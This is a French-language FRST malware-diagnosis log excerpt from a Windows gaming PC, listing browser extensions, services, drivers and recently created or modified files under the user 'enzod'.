Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2022-03-05] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @videolan.org/vlc,version=3.0.16 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-03-30] (Adobe Inc. -> Adobe Systems) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\enzod\AppData\Local\Google\Chrome\User Data\Default [2022-03-14] CHR Notifications: Default -> hxxps://rocket-league.com; hxxps://web.whatsapp.com CHR Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\enzod\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-03-14] CHR Extension: (wanteeed) - C:\Users\enzod\AppData\Local\Google\Chrome\User Data\Default\Extensions\emnoomldgleagdjapdeckpmebokijail [2022-03-14] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\enzod\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29] CHR Extension: (Settings) - C:\Users\enzod\AppData\Local [2022-04-10] CHR HKU\S-1-5-21-2718715299-2838987772-912226498-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno] CHR HKLM-x32\...\Chrome\Extension: [makcojoppodhcgmmchohadhpkicoafka] Opera: ======= OPR Profile: C:\Users\enzod\AppData\Roaming\Opera Software\Opera Stable [2022-03-31] OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding} OPR Extension: (Rich Hints Agent) - C:\Users\enzod\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2022-03-31] OPR Extension: (Amazon Assistant Promotion) - C:\Users\enzod\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-10-13] StartMenuInternet: (HKU\S-1-5-21-2718715299-2838987772-912226498-1001) Opera GXStable - "C:\Users\enzod\AppData\Local\Programs\Opera GX\Launcher.exe" Yandex: ======= YAN Profile: C:\Users\enzod\AppData\Local\Yandex\YandexBrowser\User Data\Default [2020-11-15] YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png YAN Extension: (Я.Почта) - C:\Users\enzod\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15] ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [844528 2022-03-30] (Adobe Inc. -> Adobe Inc.) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8901968 2021-03-21] (BattlEye Innovations e.K. -> ) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11666384 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) R2 CoreScanner; C:\Program Files\Zebra Technologies\Barcode Scanners\Common\CoreScanner.exe [690688 2019-09-19] (Zebra Technologies) [Fichier non signé] S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [812520 2022-01-01] (EasyAntiCheat Oy -> Epic Games, Inc) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-05] (Epic Games Inc. -> Epic Games, Inc.) R2 HPPrintScanDoctorService; C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe [260256 2022-01-27] (HP Inc. -> HP Inc.) R2 LogiFacecamService; C:\Program Files\Logitech\LogiCapture\bin\Service\LogiFacecamService.exe [497568 2021-10-25] (Logitech Inc -> Logitech) R2 MaskVPNService; C:\Program Files (x86)\MaskVPN\mask_svc.exe [7493560 2020-08-06] (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd) S3 mracsvc; C:\Windows\System32\mracsvc.exe [21062304 2020-10-30] (Mail.Ru LLC -> LLC Mail.Ru) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575064 2022-03-31] (Electronic Arts, Inc. -> Electronic Arts) R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-03-31] (Electronic Arts, Inc. -> Electronic Arts) R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [1142808 2021-10-19] (Razer USA Ltd. -> Razer Inc.) R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [451608 2021-11-17] (Razer USA Ltd. -> Razer Inc.) R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1347640 2021-10-19] (Razer USA Ltd. -> Razer Inc.) R2 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc) R2 Razer Synapse Service; C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe [294520 2021-11-18] (Razer USA Ltd. -> Razer Inc.) S3 Rockstar Service; D:\Launcher\RockstarService.exe [2447152 2022-02-05] (Rockstar Games, Inc. -> Rockstar Games) R2 rsmdriverproviderservice; C:\Program Files\Zebra Technologies\Barcode Scanners\Common\RSMDriverProviderService.exe [136192 2019-09-23] (Zebra Technologies) [Fichier non signé] R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [533824 2021-10-21] (Razer USA Ltd. -> Razer Inc.) R2 RzKLService; C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [291320 2021-11-25] (Razer USA Ltd. -> Razer Inc.) R2 ScnSrvc; C:\Program Files\Zebra Technologies\Barcode Scanners\Common\ScannerService.exe [288256 2019-09-19] (Zebra Technologies) [Fichier non signé] R3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10401912 2022-03-12] (Riot Games, Inc. -> Riot Games, Inc.) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe [3116848 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe [133544 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_c0e159863e7afdde\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_c0e159863e7afdde\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20032 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R2 BlueStacksDrv_nxt; C:\Program Files\BlueStacks_nxt\BstkDrv_nxt.sys [320728 2021-12-22] (Bluestack Systems, Inc -> Bluestack System Inc.) S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 HidGuardian; C:\WINDOWS\System32\drivers\HidGuardian.sys [37280 2017-06-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer) R2 LdVBoxDrv; C:\Program Files\ldplayerbox\LdVBoxDrv.sys [315232 2020-12-14] (MyTestCertificate -> Oracle Corporation) S3 mracdrv; C:\WINDOWS\System32\drivers\mracdrv1.sys [20298984 2020-10-30] (Mail.Ru LLC -> LLC Mail.Ru) R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) S3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\Lib\NTIOLib_X64.sys [14288 2017-07-11] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) R3 R0RazerSynapseService; C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.sys [14544 2022-04-05] (Noriyuki MIYAZAKI -> OpenLibSys.org) R3 RzCommon; C:\WINDOWS\System32\drivers\RzCommon.sys [54632 2021-03-30] (Razer USA Ltd. -> Razer Inc) R3 RzDev_006e; C:\WINDOWS\System32\drivers\RzDev_006e.sys [56152 2021-03-22] (Razer USA Ltd. -> Razer Inc) R3 RzDev_0306; C:\WINDOWS\System32\drivers\RzDev_0306.sys [54168 2020-08-24] (Razer USA Ltd. -> Razer Inc) R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions) S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [167280 2020-11-11] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2018-08-29] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S3 VBAudioVMAUXVAIOMME; C:\WINDOWS\System32\drivers\vbaudio_vmauxvaio64_win10.sys [71920 2021-12-30] (Vincent Burel -> Windows (R) Win 7 DDK provider) R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8508504 2022-03-11] (Riot Games, Inc. -> Riot Games, Inc.) R3 ViGEmBus; C:\WINDOWS\System32\drivers\ViGEmBus.sys [53128 2018-01-25] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer) R3 vmulti; C:\WINDOWS\System32\drivers\vmulti.sys [10752 2021-11-25] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) R3 VOICEMOD_Driver; C:\WINDOWS\system32\drivers\vmdrv.sys [48136 2021-03-03] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider) S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49600 2022-04-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [443664 2022-04-08] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [90384 2022-04-08] (Microsoft Windows -> Microsoft Corporation) R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [312776 2021-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Nox Limited Corporation) S3 VBAudioVMVAIOMME; \SystemRoot\System32\drivers\vbaudio_vmvaio64_win10.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-04-02 17:08 - 2022-04-02 17:08 - 000016578 _____ C:\Users\enzod\Downloads\assassins-creed-2.torrent 2022-03-30 22:26 - 2022-03-30 22:26 - 000671693 _____ C:\Users\enzod\OneDrive\Documents\Animate Ecole.rar 2022-03-30 22:24 - 2022-03-30 22:34 - 000000000 ____D C:\Users\enzod\AppData\Roaming\vlc 2022-03-30 22:24 - 2022-03-30 22:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN 2022-03-30 22:24 - 2022-03-30 22:24 - 000000000 ____D C:\Program Files (x86)\VideoLAN 2022-03-30 22:21 - 2022-03-30 22:21 - 000674440 _____ C:\Users\enzod\OneDrive\Documents\Animate Ecole.fla 2022-03-30 14:24 - 2022-03-30 14:24 - 000376462 _____ C:\Users\enzod\OneDrive\Documents\Animate bon.fla 2022-03-30 13:11 - 2022-04-10 14:44 - 000001145 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder 2022.lnk 2022-03-30 12:54 - 2022-03-30 13:11 - 000000000 ____D C:\Program Files\Adobe 2022-03-30 12:54 - 2022-03-30 12:56 - 000000000 ____D C:\Program Files (x86)\Adobe 2022-03-28 12:41 - 2022-03-28 12:41 - 000000000 ____D C:\Users\enzod\AppData\Local\Tibo_Inshape 2022-03-28 12:40 - 2022-03-28 12:40 - 284853466 _____ C:\Users\enzod\Downloads\TiboInshapeVSCalorX - 64 bits.zip 2022-03-23 19:49 - 2022-03-30 12:45 - 000000000 ____D C:\WINDOWS\LastGood.Tmp 2022-03-23 19:47 - 2022-03-17 18:33 - 000047792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhdap64.dll 2022-03-23 19:46 - 2022-03-18 07:43 - 001905904 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe 2022-03-23 19:46 - 2022-03-18 07:43 - 001905904 _____ C:\WINDOWS\system32\vulkaninfo.exe 2022-03-23 19:46 - 2022-03-18 07:43 - 001478392 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2022-03-23 19:46 - 2022-03-18 07:43 - 001478392 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2022-03-23 19:46 - 2022-03-18 07:43 - 001467840 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll 2022-03-23 19:46 - 2022-03-18 07:43 - 001432312 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll 2022-03-23 19:46 - 2022-03-18 07:43 - 001432312 _____ C:\WINDOWS\system32\vulkan-1.dll 2022-03-23 19:46 - 2022-03-18 07:43 - 001209400 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll 2022-03-23 19:46 - 2022-03-18 07:43 - 001145584 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll 2022-03-23 19:46 - 2022-03-18 07:43 - 001145584 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll 2022-03-23 19:46 - 2022-03-18 07:40 - 000795704 _____ C:\WINDOWS\system32\nvofapi64.dll 2022-03-23 19:46 - 2022-03-18 07:40 - 000715944 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvml.dll 2022-03-23 19:46 - 2022-03-18 07:40 - 000636480 _____ C:\WINDOWS\SysWOW64\nvofapi.dll 2022-03-23 19:46 - 2022-03-18 07:39 - 002121688 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll 2022-03-23 19:46 - 2022-03-18 07:39 - 001600680 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll 2022-03-23 19:46 - 2022-03-18 07:39 - 001529936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll 2022-03-23 19:46 - 2022-03-18 07:39 - 001175696 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll 2022-03-23 19:46 - 2022-03-18 07:39 - 000981648 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll 2022-03-23 19:46 - 2022-03-18 07:39 - 000712664 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvidia-smi.exe 2022-03-23 19:46 - 2022-03-18 07:38 - 008610472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll 2022-03-23 19:46 - 2022-03-18 07:38 - 007713872 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll 2022-03-23 19:46 - 2022-03-18 07:38 - 005729752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2022-03-23 19:46 - 2022-03-18 07:38 - 005101528 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll 2022-03-23 19:46 - 2022-03-18 07:38 - 002931856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll 2022-03-23 19:46 - 2022-03-18 07:38 - 000456872 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdebugdump.exe 2022-03-23 19:46 - 2022-03-18 07:36 - 000850088 _____ (NVIDIA Corporation) C:\WINDOWS\system32\MCU.exe 2022-03-23 19:46 - 2022-03-17 18:33 - 000089337 _____ C:\WINDOWS\system32\nvinfo.pb 2022-03-23 17:43 - 2022-04-10 15:24 - 000000000 ____D C:\FRST 2022-03-11 21:35 - 2022-03-11 21:35 - 000000000 ____D C:\Users\enzod\OneDrive\Documents\FeedbackHub ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-04-10 15:20 - 2020-09-17 19:16 - 000000000 ____D C:\Users\enzod\AppData\Roaming\discord 2022-04-10 15:12 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-04-10 15:05 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2022-04-10 14:50 - 2020-09-17 18:56 - 000000000 ____D C:\Users\enzod\AppData\Local\PlaceholderTileLogoFolder 2022-04-10 14:49 - 2020-11-17 19:25 - 000000000 ____D C:\Program Files (x86)\Google 2022-04-10 14:44 - 2020-11-19 15:19 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat 2022-04-10 14:44 - 2020-11-19 13:41 - 000000000 ____D C:\ProgramData\Riot Games 2022-04-10 14:44 - 2020-10-07 21:53 - 000000000 ____D C:\ProgramData\NVIDIA 2022-04-10 14:44 - 2020-09-24 11:41 - 000016131 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1 2022-04-10 14:44 - 2020-09-24 10:34 - 000009646 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1 2022-04-10 14:44 - 2020-09-23 16:06 - 000010411 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1 2022-04-10 14:44 - 2020-09-22 21:41 - 000011445 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1 2022-04-10 14:44 - 2020-09-18 12:53 - 000001008 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2022-04-10 14:44 - 2020-09-17 19:15 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk 2022-04-10 14:44 - 2020-06-11 09:38 - 000002417 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk 2022-04-10 14:44 - 2020-06-11 09:19 - 000014642 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1 2022-04-10 14:34 - 2020-09-17 19:16 - 000000000 ____D C:\Users\enzod\AppData\Local\Discord 2022-04-10 14:33 - 2021-04-23 18:35 - 000004176 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{17172BA3-A92C-4B31-8A05-0E9AE5D7EA3A} 2022-04-08 20:21 - 2021-12-25 23:20 - 000002094 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks 5 Multi-Instance Manager.lnk 2022-04-08 20:21 - 2021-01-13 17:50 - 000000880 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BakkesMod.lnk 2022-04-08 20:21 - 2020-09-24 08:50 - 000019759 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1 2022-04-08 20:21 - 2020-06-11 09:38 - 000002416 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk 2022-04-08 20:20 - 2021-04-23 18:27 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2022-04-08 18:58 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps 2022-04-08 18:32 - 2021-12-25 23:20 - 000002096 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks 5.lnk 2022-04-08 18:32 - 2021-11-24 13:26 - 000001041 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Animate 2022.lnk 2022-04-08 18:32 - 2021-11-24 09:05 - 000001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2022-04-08 10:18 - 2020-06-11 09:14 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2022-04-08 10:15 - 2020-09-21 20:28 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-04-07 17:01 - 2021-04-23 18:35 - 000004244 _____ C:\WINDOWS\system32\Tasks\Opera GX scheduled Autoupdate 1612973953 2022-04-07 17:01 - 2021-02-10 18:19 - 000001437 _____ C:\Users\enzod\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navigateur Opera GX.lnk 2022-04-06 21:06 - 2021-01-15 00:28 - 000000000 ____D C:\Program Files (x86)\Origin 2022-04-06 16:44 - 2021-04-26 10:21 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d7385e362e5630 2022-04-06 16:44 - 2021-04-23 18:35 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2022-04-06 01:10 - 2021-04-23 18:29 - 000000000 ____D C:\Users\enzod 2022-04-05 22:31 - 2021-04-23 18:38 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2022-04-05 22:31 - 2020-09-30 18:10 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools 2022-04-05 22:31 - 2019-12-07 16:49 - 000791594 _____ C:\WINDOWS\system32\perfh00C.dat 2022-04-05 22:31 - 2019-12-07 16:49 - 000149760 _____ C:\WINDOWS\system32\perfc00C.dat 2022-04-05 22:31 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF 2022-04-05 22:27 - 2021-04-23 18:35 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2022-04-05 22:27 - 2021-04-23 18:27 - 000008192 ___SH C:\DumpStack.log.tmp 2022-04-05 22:27 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\ServiceState 2022-04-05 22:27 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2022-04-05 18:26 - 2020-11-17 19:28 - 000002248 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2022-04-04 20:50 - 2020-06-11 09:37 - 000000000 ____D C:\Program Files\Microsoft Office 2022-04-04 11:39 - 2021-04-23 18:35 - 000004236 _____ C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1610657325 2022-04-04 11:39 - 2021-01-14 22:48 - 000001408 _____ C:\Users\enzod\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navigateur Opera.lnk 2022-04-03 00:23 - 2020-09-18 07:31 - 000000000 ____D C:\Program Files (x86)\Steam 2022-04-01 12:48 - 2020-06-11 10:05 - 000000185 _____ C:\WINDOWS\system32\symbscnr.log.bak 2022-03-31 12:59 - 2020-09-17 18:56 - 000000000 ___RD C:\Users\enzod\OneDrive 2022-03-30 22:31 - 2020-10-16 16:52 - 000000000 ____D C:\Users\enzod\OneDrive\Documents\Adobe 2022-03-30 22:31 - 2020-09-17 18:54 - 000000000 ____D C:\Users\enzod\AppData\Roaming\Adobe 2022-03-30 13:32 - 2021-11-24 15:40 - 000015201 _____ C:\Users\enzod\OneDrive\Documents\animate basket.fla 2022-03-30 13:31 - 2020-10-07 22:05 - 000000000 ____D C:\Users\enzod\AppData\Local\CrashDumps 2022-03-30 13:30 - 2021-04-23 18:40 - 000000000 ____D C:\Users\enzod\AppData\Local\D3DSCache 2022-03-30 13:11 - 2020-10-16 16:50 - 000000000 ____D C:\Program Files\Common Files\Adobe 2022-03-30 13:07 - 2020-10-16 16:48 - 000000000 ____D C:\Users\enzod\AppData\Local\Adobe 2022-03-30 13:01 - 2020-10-16 16:48 - 000000000 ____D C:\ProgramData\Adobe 2022-03-30 12:56 - 2021-11-23 19:32 - 000000000 ___RD C:\Users\enzod\Creative Cloud Files 2022-03-24 19:32 - 2020-09-29 19:09 - 000000000 _____ C:\WINDOWS\system32\Drivers\lvuvc.hs 2022-03-23 21:13 - 2020-09-30 18:10 - 000601432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll 2022-03-23 21:12 - 2020-09-30 18:10 - 000483664 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll 2022-03-23 19:49 - 2020-10-03 14:26 - 000000000 ____D C:\Users\enzod\AppData\Local\NVIDIA 2022-03-22 14:57 - 2020-11-19 13:45 - 000000000 ____D C:\Program Files\Riot Vanguard 2022-03-22 00:09 - 2019-12-07 11:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI 2022-03-18 07:39 - 2021-11-08 18:49 - 000792208 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll 2022-03-18 07:35 - 2021-11-08 18:49 - 006458872 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll 2022-03-18 07:35 - 2021-03-23 20:40 - 007611808 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll 2022-03-17 18:33 - 2021-03-23 20:41 - 000134832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys 2022-03-16 20:20 - 2021-12-25 23:19 - 000000000 ____D C:\ProgramData\BlueStacks_nxt 2022-03-11 14:26 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp ==================== Fichiers à la racine de certains dossiers ======== 2020-12-14 14:26 - 2020-12-14 14:26 - 000000068 _____ () C:\Users\enzod\AppData\Roaming\changzhi_leidian.data 2021-12-30 19:33 - 2021-12-30 19:34 - 000042215 _____ () C:\Users\enzod\AppData\Roaming\VoiceMeeterBananaDefault.xml 2022-01-03 10:13 - 2022-01-03 10:13 - 000006734 _____ () C:\Users\enzod\AppData\Local\archive.zip 2022-03-08 11:29 - 2022-03-08 11:29 - 000007601 _____ () C:\Users\enzod\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) ==================== Fin de FRST.txt ========================